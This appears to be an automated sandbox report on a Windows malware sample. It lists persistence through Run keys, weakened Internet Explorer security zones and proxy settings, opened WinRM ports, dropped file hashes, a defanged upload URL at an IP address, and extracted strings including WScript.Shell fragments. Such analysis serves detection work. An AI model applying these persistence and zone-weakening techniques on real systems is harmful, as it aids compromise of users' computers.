"5232108f" = "¡¯… SñäÐôsÃ…8,¼‚Å;QpÅ’oëDôGfÊj/›&Â¥#YW°~ ýÉ¥´E/ôñÝÙln‹[^7Ù‰ÉåS¤Øl©Czæñ xˆí·uÛÓÉ„hµññKro“´®­„Ù,ÅÀ~‡ “LãŸE D´ÉAžR°ø7A"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"2300" = "0"

[HKLM\SOFTWARE\e307dfcb0a]
"52b1e748" = "13391CC12FC38C00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1206" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1809" = "3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\OSUpgrade]
"ReservationsAllowed" = "0"

[HKCU\Software\e307dfcb0a]
"52b1e748" = "13391CC12FC38C00"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"iexplore.exe" = "8888"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"iexplore.exe" = "8888"

[HKLM\SOFTWARE\e307dfcb0a]
"0494a3ce" = "1458847728"

To automatically run itself each time Windows is booted, the Malware adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\ovuki\ovuki.exe"

The Malware modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Malware modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Malware adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\ovuki\ovuki.exe"

The Malware deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

"ProxyServer"
"AutoConfigURL"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]

The Malware disables automatic startup of the application by deleting the following autorun value:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

The process regsvr32.exe:1976 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "67 B1 C9 C7 E2 94 5F 35 8F 4B 1C 84 35 A3 17 82"

The process regsvr32.exe:928 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 ED 54 F6 7F 78 81 43 E0 A2 43 DC 75 35 7D DE"

The process regsvr32.exe:780 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\e307dfcb0a]
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\e307dfcb0a]
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"WindowsXP-KB968930-x86-ENG.exe" = "Self-Extracting Cabinet"

[HKLM\SOFTWARE\426591DD63C42F91BAC7]
"A87E69C400006ACF" = "A87E69C400006ACF"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A BE E4 BB 60 15 9F F6 E8 5A A3 69 AA 7B 06 E3"

[HKLM\SOFTWARE\5285EC06AD268F40039D]
"12032038D44CB20ACE" = "12032038D44CB20ACE"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Malware modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Malware modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\426591DD63C42F91BAC7]
[HKLM\SOFTWARE\5285EC06AD268F40039D]

The Malware deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"

[HKLM\SOFTWARE\5285EC06AD268F40039D]
"12032038D44CB20ACE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKLM\SOFTWARE\426591DD63C42F91BAC7]
"A87E69C400006ACF"

The process wsmanhttpconfig.exe:2740 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 5C F6 37 FD 93 48 8E 14 3B DC 98 24 37 A4 6C"

The process wsmanhttpconfig.exe:2668 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 FC 60 00 A0 2B 15 A7 FF 98 87 D1 89 A9 B0 9E"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Event Forwarding Plugin]
"ConfigXML" = ""

[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http:// :47001/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"80:TCP" = "80:TCP:*:Enabled:Windows Remote Management - Compatibility Mode (HTTP-In)"

[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"https:// :5986/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"5985:TCP" = "5985:TCP:*:Enabled:Windows Remote Management"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"UpdatedConfig" = "6C0F31ED-80C5-4DB8-9E10-DB9BE1576FD3"

[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http:// :5985/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\WMI Provider]
"ConfigXML" = ""

Dropped PE files

MD5 File path
790b98252fc274efed657d0de64821b9 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\ovuki\ovuki.exe
9859a26d5e72bbb0685af813b409d99d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe
fc9a05096522bb6d7ceda62ea1707420 c:\WINDOWS\$968930Uinstall_KB968930$\PSCustomSetupUtil.exe
35efd8cd6549a4339cb2a28c8cfd6598 c:\WINDOWS\$968930Uinstall_KB968930$\PSSetupNativeUtils.exe
a39df582ca051afc8811fbd00db12f10 c:\WINDOWS\$968930Uinstall_KB968930$\spuninst\spuninst.exe
9a055da2f2819f155c33d47cd67a7c00 c:\WINDOWS\$968930Uinstall_KB968930$\spuninst\updspapi.dll
75c183e262bd4400eb0f20349f6ef383 c:\WINDOWS\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll
2f7fe3a781ba8c0a67c775f20e3e9f70 c:\WINDOWS\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll
4e2482e69baaf3a5b13db8101c063ebf c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.resources.dll
08e87e8abf7b41b28663dce817ce0ab6 c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll
b87e087fc013225e2aa1cb60c080647d c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.resources.dll
f3ac3f844f90380aab2b4c0836c4288f c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll
1ce73fb3f88c716cfc3fd550547d2b35 c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.resources.dll
dfeb401cc051e5da721c584ff6a90f88 c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll
36ff641f37918f2cca98e7f407ac4d75 c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.resources.dll
3991b7fa452a9c9c291c06365a236792 c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll
208fa9d0ebe2ceb9616042772e96598e c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Editor\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Editor.dll
d4eefccdc3de6ced901535fa4153c491 c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.GPowerShell\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.GPowerShell.dll
3eab4dbdc290edc4d53fe77f1fdb9e59 c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.GraphicalHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.GraphicalHost.dll
c7a0d1321a67a2afd330c5fbe79befd1 c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Security.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Security.resources.dll
53a9d748ef09920a0d06da2583c298ad c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll
6372ea7d2aced7185183cf3fcdd3577b c:\WINDOWS\assembly\GAC_MSIL\Microsoft.WSMan.Management.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.WSMan.Management.resources.dll
1a4e900c2fe3cd31d10107670d184fe6 c:\WINDOWS\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll
f7da27672d2e4c21a1f996ee31de0dbf c:\WINDOWS\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll
2286b57ecc2d32d24049c51989084268 c:\WINDOWS\assembly\GAC_MSIL\System.Management.Automation.resources\1.0.0.0_en_31bf3856ad364e35\System.Management.Automation.resources.dll
4d8ab4fad244f7985d8c59d456e026d7 c:\WINDOWS\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
85d7ab466d0577c49fc9879107ec7ef5 c:\WINDOWS\system32\WindowsPowerShell\v1.0\CompiledComposition.Microsoft.PowerShell.GPowerShell.dll
173d3dd1425a8e33fa1d4ed71067a3a2 c:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\microsoft.backgroundintelligenttransfer.management.interop.dll
df4217ddb34a0b73dc7aac7829371c0c c:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
fe7bc06af17d7cd8fb8e6d72d72453b8 c:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe.mui
36b6f71b6d7d280302b348145db05a9f c:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell_ise.exe
cb3a534127f37d0fa1f556dbb76575d3 c:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell_ise.resources.dll
95b7f12a557dedac5e4a1e9afa5e73ab c:\WINDOWS\system32\WindowsPowerShell\v1.0\pspluginwkr.dll
a94243b797377ba03b63fc716c13bcf5 c:\WINDOWS\system32\WindowsPowerShell\v1.0\pwrshmsg.dll
7943a80f1a6fd37969aacd411b511f91 c:\WINDOWS\system32\WindowsPowerShell\v1.0\pwrshsip.dll
2c9c9ae86eb2b4e78c8e09deb7509a63 c:\WINDOWS\system32\WsmAuto.dll
67146d3606be1111a39f0fd61f47e9b6 c:\WINDOWS\system32\WsmRes.dll
18f347402da544a780949b8fdf83351b c:\WINDOWS\system32\WsmSvc.dll
296e6992278fea7140d88b603e6c2a8a c:\WINDOWS\system32\WsmWmiPl.dll
8c386819bf5b39d7a4b274d0b55f87a5 c:\WINDOWS\system32\pwrshplugin.dll
84e025b1259c66315f4d45a6caecacc9 c:\WINDOWS\system32\wevtfwd.dll
cd17705af8e53a82facb545a213ab09c c:\WINDOWS\system32\winrmprov.dll
afdf7654880ce23005014895b129d948 c:\WINDOWS\system32\winrs.exe
3e9b11880ae4a8ff399ce0573c82655b c:\WINDOWS\system32\winrscmd.dll
62021e3e6ba13d72cf5cc1047cfac991 c:\WINDOWS\system32\winrshost.exe
b84092e52861a026fc83bcede4a7abfa c:\WINDOWS\system32\winrsmgr.dll
35bc7c49676e5ab617ef94dc9854a6f1 c:\WINDOWS\system32\winrssrv.dll
972916faac89c4aa978952b30f478e81 c:\WINDOWS\system32\wsmanhttpconfig.exe
23ce21efc2ae95700f2b1f9582fe3867 c:\WINDOWS\system32\wsmplpxy.dll
faa2fcc6853e5123e05dccc5919657e2 c:\WINDOWS\system32\wsmprovhost.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 3886 4096 4.17201 f4685099542889ddee7ef5d0229e59f1
.rdata 8192 2224 2560 3.18251 d3cfe8fb71be63f5067e2cad6fcd5704
.data 12288 3236 512 2.07387 f99b8e8de3b97a6e9c21177e9451b4d9
.rsrc 16384 250840 250880 5.54389 a7d66e7e7c506cc618718ae55929f22c

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://78.24.220.229/upload.php
hxxp://microsoft.com/
hxxp://e10088.dspb.akamaiedge.net/
hxxp://e10088.dspb.akamaiedge.net/uk-ua/
hxxp://e3673.dspg.akamaiedge.net/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

The Malware connects to the servers at the folowing location(s):

regsvr32.exe_436:

.idata
.reloc
P.rsrc
Portions Copyright (c) 1983,99 Borland
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
wininet.dll
user32.dll
ntdll.dll
Kernel32.dll
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
PSAPI.dll
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('video'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {jwplayer().play()} catch(e){}
IWebBrowser
IWebBrowserApp
IWebBrowser2
.length;
 =String.fromCharCode(parseInt(
.substr(
,2),16));
 =String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt());
.length-1)?
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Run("
=new ActiveXObject("WScript.Shell");
.RegRead("
psapi.dll
HTTP/1.1
\\.\LCD
1234567890
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
0123456789
Mozilla
?456789:;<=
!"#$%&'()* ,-./0123
.text
`.rdata
@.pdata
KERNEL32.dll
@.reloc
222.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegOpenKeyExW
RegDeleteKeyW
RegCreateKeyW
RegCreateKeyA
version.dll
SetProcessWindowStation
OpenWindowStationA
EnumChildWindows
HttpSendRequestA
HttpOpenRequestA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
DeleteUrlCacheEntry
ole32.dll
wsock32.dll
winmm.dll
atl.dll
wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
shell32.dll
ShellExecuteExW
NtQueryValueKey
NtDeleteValueKey
NtSetValueKey
urlmon.dll
UrlMkSetSessionOption
4"4,414?4
2 2*393
7:8?8[8`8
8$8(8,8084888
Ri8aXf8RMS9kwfLTePGA5cuunQIGdwDTg8lIk/aZfb4sEEVIQPLYbEXRLF0omAUxRTG Q9FiJ3iyff6qj4Gkkv9KX3N4Kot06WGnxXEch6JUbLjZ45/YS2dzdkUCIxvHdarUDHHI3JMMqO7K7IBd01EpbB0PxbC61Td78MNiPzB/jZF6rqs4zDkZGanDTyBM52sPH8XYqbKPlXjlHL6Kw5EGq voGi4L8MDWckJ1VqrTHGFwQ4PBUl8l4HkJUoCFCjkoFryvMUUvx1oqSn3Q9/ON22eEEnrro3n32sIelEIWE 1vmKGuDcaLtKkLDsmzy lINg9/yvNr94D7VIUk8fqg5 Mw0GB8h33z yJ3scmf0ZRdHqXPSwkmODEwxPFFgRxKXR TvpDX4Knb7UjKOL5scgBEg1QVHi5QZ6BsE68J3A1LrJEzFMuI8wMNoHwEbvvW/FJGqkpegyHDt trwOd2IItS5EnuHI2d/uzQh5VHnBSk4JSTmE0u6xOjsFhutAT WmdoZXJYPll4Bh4H6ucjO AYjAViCZirXzcqmB l537VJM3zXLBGQfTTbOXB3PsSCYQ8W7MZSmZZkSCrm9SQmoYOG8Crds37EqviX UdKDkOXHUVvNkJfS6mUUVVvgwADFwOqPY K8 rp jg3LOIIfFjKAm6nW6xaETjRGPjPh522JndLpuBUZtjFRDsJ8lZSb5AN0MSFql oCchNTpo462Bqr84mG/jPhbz31a6OWiVs3GxLQZWUZEaqeI8FHrQMyfqBBJcHw47obOrkzdjyznzRXUSE rpEswADU9bDqGaiQwnfeazZAVGNXCSlnJqnv2QcGkhBNLPtDm1YhZJU4TzIUHmGRKdjvCKWCwCtq9d63MyCG17et0oR5g8 vFtX7jDL02EB/G9O59jFieuGpzJE3WBRHUOQqCEMEk0UCP/Lxr5RGPNrDNXHduPbrmof660edbyazSZtjjA/fbiCplKhzitPQZRzWCktoKKc7pcc2mvFcjT3tUVbSYfC75 O1G5Zg42AN9GAPyRhn5rk9rIvCjruUHEi4dY4kAtqWdOcjHL5fqpfajiyO/RXfgrC0AfhoiGemP2JnB960j9oagiSfZ3VxHhJLj37GppNYL1/89ueXoh5Vy8 lTJiEoYmGGlAl88KHUZuTXFpYT1Z4pXwrnkI1DVL0FGs5NdOGyeAKbo9Xs8aaxYTujku558nD2FwnA8IbBi/67WT7RAWsSKtkL7lwOLlXQvtYpwBTQWZGFtkrPjcl90DK3mSP7oPWaH9BX4iKhz22JFaLEdNiv Czh4Jqttes3oX5OJRCdws0qp2Use97 oZKC0dHxN c2O3ESpZEBDbH0bVRUzaGsrIxNiMCa/5tsuAQ0LNTWXOP OsgpRnhkJCRZmPVSrBRVpZcKv7kkxzJjw551n71u2Y66AqpnTGKkOLL6FaRYDOjKEFvzerH4etYGKb/jjwmddy UzY4Z7ws6AhGJNW1kcn A5ytg4s7ePRSHrJ0HK1sIw/E1cefkAxp0RryFmuzjMFBFOvc09 QIrPWZAEycm56xakGU9qcxMbjK9xH2rsR9wF6Qjv6LH6FNU4PsUPsJUE5D3GHahvJZd8MDR7I fIgJ8Y6i8R7Iw4cTZzdcp3rH/gGylGwtuYK zpQFPnJs6TxJVhgwDVeibDGT cmuqdt9nGnKay8OB1/ mDjsWs47ndexRZydsatmD05dCuRDDzbKRKYD16WR4DvdPOYNy7OXo990c1pmWCrBs/pF6fd6 KBui54jz6ufiSsN1ZbqIXzMCGlhd0PkM4FgyGrQaE6b gMMDLeoDBR4qIWoBVY/Ozl2Vzd5Zi4dZ6hjc28f8F/1KoyfS4V NtDR0uEcsuU6I2q1naokDAFPfiFV YRhBVNZiYzVCnqBV2kyWO/paeIb7H/2ZKIvSDkVTWaNvbE0089Q59Kj5R byL6Y9H1ciLdE38IKeWjQa9fPSRlJyvpQMS0AbX4RPvo2tIhk3Lm5c17JUOK3OGbShzt8YHIrt/9a4slvfxs7os3bg6jJax97rJqVRUFuWJ20ML1 K0yeV2wMayqZrFghV/2ycUtga7fgZVih20wz90ev4EMxyWnR/I zdEDL1PwKvjn2ReeUtzL OFyzn8cVqSQTjMD08oAmH0UNEFQlfwkkwM9X4YMrPqryUOc1RaYxgQ7z0YrY/kGk lic5r E1Ffkn9Ft5xT89i860r3D0M5BlnRdFcTZETH18mUVAnVoZLvbxWRTqDWgwr42Z XVj khzcfvUisqAPQfOiM77oUXcOxiRyfHcmmirIvBpL3zt LpmLZrGE81V5uTgklyT/PpQVbokkPIhThIqvbuDH1x77tz8qVgq62kuCcQQ8C9 pZfvUhaE7k5ZrK7SpO0CI8XSCcRBz3AFeFiQm1 iMbaL1nyAgL/xF76iP9FxTUJmXwYCWaauG  MrhELjoIDyUOztQ/Ws8 vXqYvX98cJyozEweWuTUNc7q5 p0 ESCmgrhIL/30f2rmzMrFDQAASJ4qk2YFkv1drFC 